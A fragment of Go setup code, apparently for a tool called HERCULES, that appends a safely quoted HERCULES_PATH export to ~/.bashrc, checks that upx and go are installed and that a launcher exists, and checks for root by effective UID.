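	if home == "" {
		return &os.PathError{Op: "open", Path: "~/.bashrc", Err: os.ErrNotExist}
	}
	f, err := os.OpenFile(home+"/.bashrc", os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644)
	if err != nil {
		return err
	}
	_, werr := f.WriteString("export HERCULES_PATH=" + shellSingleQuote(path) + "\n")
	if cerr := f.Close(); werr == nil {
		werr = cerr
	}
	return werr
}

// shellSingleQuote wraps s in single quotes for a POSIX shell, rewriting each
// embedded ' as '\'' so the result is always read back as one literal word.
func shellSingleQuote(s string) string {
	return "'" + strings.Replace(s, "'", `'\''`, -1) + "'"
}

// CheckValid reports whether the tools setup depends on are present and the
// launcher was installed. It returns false plus a printable error message on
// the first missing item, and true with an empty message otherwise.
// exec.LookPath replaces running `upx` / `go version` and grepping their
// output; os.Stat replaces `cd /bin && ls` and a substring match that any
// file whose name merely contained "HERCULES" would have satisfied.
func CheckValid() (bool, string) {

	if _, err := exec.LookPath("upx"); err != nil {
		return false, "[!] ERROR : upx is not installed"
	}

	if _, err := exec.LookPath("go"); err != nil {
		return false, "[!] ERROR : golang is not installed"
	}

	if _, err := os.Stat(herculesBinPath); err != nil {
		return false, "[!] ERROR : Unable to create shoutcut "
	}

	return true, ""

}

// CheckSUDO reports whether the process is running as root. It checks the
// effective UID directly instead of searching `whoami` output for "root",
// which also matched any user name containing that substring.
func CheckSUDO() bool {
	return os.Geteuid() == 0
}
--------------------------------------------------------------------------------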